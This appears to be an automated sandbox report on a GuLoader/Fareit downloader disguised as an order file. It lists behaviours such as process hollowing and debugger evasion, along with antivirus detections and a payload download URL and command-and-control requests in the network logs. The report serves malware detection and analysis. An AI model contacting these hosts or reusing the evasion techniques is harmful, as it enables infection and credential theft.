SHA512 06be8c2f49771d0015b65ecc2ed035e3e73fd33cdf43457d246ffb50a63149abec470afd363cc3e6a3948c4edaad0dc9f2ccbe22c34ae45fbb816f9bf53b4597
CRC32 DC790295
Ssdeep 1536:dDrdLtw+5J/BGPwDwvETDeOeIdD42u/vK:BrdhR7Ec/eOeEh
Download Download ZIP Resubmit sample

Signatures

Behavioural detection: Executable code extraction - unpacking
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 4740 trigged the Yara rule 'shellcode_get_eip'
Hit: PID 4740 trigged the Yara rule 'shellcode_patterns'
Hit: PID 4740 trigged the Yara rule 'GuLoader'
Creates RWX memory
NtSetInformationThread: attempt to hide thread from debugger
Possible date expiration check, exits too soon after checking local time
process: Sri Lank Inquiry Order.pif, PID 4740
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: SXS.DLL/SxsOleAut32MapIIDOrCLSIDToTypeLibrary
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: asycfilt.dll/FilterCreateInstance
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: VERSION.DLL/VerQueryValueA
DynamicLoader: VERSION.DLL/GetFileVersionInfoSizeA
DynamicLoader: VERSION.DLL/GetFileVersionInfoA
DynamicLoader: kernel32.dll/GetCalendarInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventWrite
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/StringFromIID
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoSetProxyBlanket
DynamicLoader: ole32.dll/ObjectStublessClient10
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegEnumKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
HTTPS urls from behavior.
URL: http://ratamodu.ga/~zadmin/group/apsfb_BwRMswJ149.bin
CAPE extracted potentially suspicious content
Sri Lank Inquiry Order.pif: Injected PE Image: 32-bit DLL
Sri Lank Inquiry Order.pif: Injected Shellcode/Data
Sri Lank Inquiry Order.pif: GuLoader
Sri Lank Inquiry Order.pif: Injected PE Image: 32-bit executable
Sri Lank Inquiry Order.pif: Unpacked Shellcode
Multiple direct IP connections
direct_ip_connections: Made direct connections to 7 unique IP addresses
HTTP traffic contains suspicious features which may be indicative of malware related traffic
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
suspicious_request: http://www.thetoptitle.com/c216/?lxldz=Nnqh7TNKIIDcqdzGNwugJZtqnGWTOdvJypW6t/M5WntLNAJT3RrvH7SpKhfW7prI&Tj=YBZ4
suspicious_request: http://www.barsoum.dentist/c216/?lxldz=qDsuE3Dsv2OzkxyZUeXZwGu6bH8qaHXOomLR5n8tK0jzX5EyijM1plB0iZv+jWrr&Tj=YBZ4&sql=1
suspicious_request: http://www.barsoum.dentist/c216/
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
Performs some HTTP requests
url: http://ratamodu.ga/~zadmin/group/apsfb_BwRMswJ149.bin
url: http://www.thetoptitle.com/c216/?lxldz=Nnqh7TNKIIDcqdzGNwugJZtqnGWTOdvJypW6t/M5WntLNAJT3RrvH7SpKhfW7prI&Tj=YBZ4
url: http://www.barsoum.dentist/c216/?lxldz=qDsuE3Dsv2OzkxyZUeXZwGu6bH8qaHXOomLR5n8tK0jzX5EyijM1plB0iZv+jWrr&Tj=YBZ4&sql=1
url: http://www.barsoum.dentist/c216/
Unconventionial language used in binary resources: Catalan
Authenticode signature is invalid
authenticode error: No signature found. SignTool Error File not valid C\Users\Louise\AppData\Local\Temp\Sri Lank Inquiry Order.pif
Behavioural detection: Injection (Process Hollowing)
Injection: Sri Lank Inquiry Order.pif(4740) -> Sri Lank Inquiry Order.pif(4088)
Executed a process and injected code into it, probably while unpacking
Injection: Sri Lank Inquiry Order.pif(4740) -> Sri Lank Inquiry Order.pif(4088)
Behavioural detection: Injection (inter-process)
File has been identified by 20 Antiviruses on VirusTotal as malicious
McAfee: Fareit-FST!3F2FD6C7F273
Cylance: Unsafe
Sangfor: Malware
F-Prot: W32/VBKrypt.AMM.gen!Eldorado
APEX: Malicious
Kaspersky: UDS:DangerousObject.Multi.Generic
Paloalto: generic.ml
Endgame: malicious (high confidence)
Fortinet: W32/Agent.HKMB!tr
Trapmine: malicious.high.ml.score
Cyren: W32/VBKrypt.AMM.gen!Eldorado
ViRobot: Trojan.Win32.Guloader.81920.G
ZoneAlarm: UDS:DangerousObject.Multi.Generic
Microsoft: PWS:Win32/Fareit.AB!MTB
BitDefenderTheta: Gen:[email protected]
Malwarebytes: Trojan.MalPack.VB
ESET-NOD32: a variant of Win32/Injector.EMGX
Rising: Downloader.Guloader!1.C738 (CLASSIC)
SentinelOne: DFI - Suspicious PE
eGambit: Unsafe.AI_Score_100%
Attempts to modify proxy settings
Created network traffic indicative of malicious activity
signature: ET JA3 Hash - Possible Malware - RigEK
signature: ET JA3 Hash - Possible Malware - Various Eitest

Screenshots


Hosts

Direct IP Country Name
Y 23.211.5.239 [VT] Netherlands
N 84.38.181.216 [VT] Russian Federation
Y 8.8.8.8 [VT] United States
Y 72.21.91.29 [VT] United States
Y 52.114.128.43 [VT] United States
N 23.227.38.64 [VT] Canada
Y 184.51.9.166 [VT] United States
N 184.168.221.40 [VT] United States
Y 172.217.16.142 [VT] United States
Y 1.1.1.1 [VT] Australia

DNS

Name Response Post-Analysis Lookup
ratamodu.ga [VT] A 84.38.181.216 [VT] 84.38.181.216 [VT]
www.mums-in.net [VT] NXDOMAIN
www.thetoptitle.com [VT] A 23.227.38.64 [VT] 23.227.38.64 [VT]
www.outdoorbusters.info [VT]
www.jqrsky.com [VT]
www.pbrgen.com [VT]
www.barsoum.dentist [VT] A 184.168.221.40 [VT] 184.168.221.34 [VT]
www.sixouyo.com [VT]

Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\Users\Louise\AppData\Local\Temp\Sri Lank Inquiry Order.pif.cfg
C:\Windows\sysnative\C_932.NLS
C:\Windows\sysnative\C_949.NLS
C:\Windows\sysnative\C_950.NLS
C:\Windows\sysnative\C_936.NLS
C:\Users\Louise\AppData\Local\Temp\~DFB1B9194643FC134C.TMP
C:\Program Files\Qemu-ga\qemu-ga.exe
C:\Program Files\qga\qga.exe
C:\Windows\SysWOW64\msvbvm60.dll
C:\Windows\SysWOW64\ntdll.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\Users\Louise\AppData\Local\Temp\~DFB1B9194643FC134C.TMP
C:\Program Files\Qemu-ga\qemu-ga.exe
C:\Program Files\qga\qga.exe
C:\Windows\SysWOW64\msvbvm60.dll
C:\Windows\SysWOW64\ntdll.dll
C:\Users\Louise\AppData\Local\Temp\~DFB1B9194643FC134C.TMP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Codepage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT\UserEra
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Policies\Microsoft\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\startbogstavs\Caponized9
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Tuberculomas\Coatninger
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadNetworkName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
kernel32.dll.IsProcessorFeaturePresent
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
cryptbase.dll.SystemFunction036
oleaut32.dll.OleLoadPictureEx
oleaut32.dll.DispCallFunc
oleaut32.dll.LoadTypeLibEx
oleaut32.dll.UnRegisterTypeLib
oleaut32.dll.CreateTypeLib2
oleaut32.dll.VarDateFromUdate
oleaut32.dll.VarUdateFromDate
oleaut32.dll.GetAltMonthNames
oleaut32.dll.VarNumFromParseNum
oleaut32.dll.VarParseNumFromStr
oleaut32.dll.VarDecFromR4
oleaut32.dll.VarDecFromR8
oleaut32.dll.VarDecFromDate
oleaut32.dll.VarDecFromI4
oleaut32.dll.VarDecFromCy
oleaut32.dll.VarR4FromDec
oleaut32.dll.GetRecordInfoFromTypeInfo
oleaut32.dll.GetRecordInfoFromGuids
oleaut32.dll.SafeArrayGetRecordInfo
oleaut32.dll.SafeArraySetRecordInfo
oleaut32.dll.SafeArrayGetIID
oleaut32.dll.SafeArraySetIID
oleaut32.dll.SafeArrayCopyData
oleaut32.dll.SafeArrayAllocDescriptorEx
oleaut32.dll.SafeArrayCreateEx
oleaut32.dll.VarFormat
oleaut32.dll.VarFormatDateTime
oleaut32.dll.VarFormatNumber
oleaut32.dll.VarFormatPercent
oleaut32.dll.VarFormatCurrency
oleaut32.dll.VarWeekdayName
oleaut32.dll.VarMonthName
oleaut32.dll.VarAdd
oleaut32.dll.VarAnd
oleaut32.dll.VarCat
oleaut32.dll.VarDiv
oleaut32.dll.VarEqv
oleaut32.dll.VarIdiv
oleaut32.dll.VarImp
oleaut32.dll.VarMod
oleaut32.dll.VarMul
oleaut32.dll.VarOr
oleaut32.dll.VarPow
oleaut32.dll.VarSub
oleaut32.dll.VarXor
oleaut32.dll.VarAbs
oleaut32.dll.VarFix
oleaut32.dll.VarInt
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarRound
oleaut32.dll.VarCmp
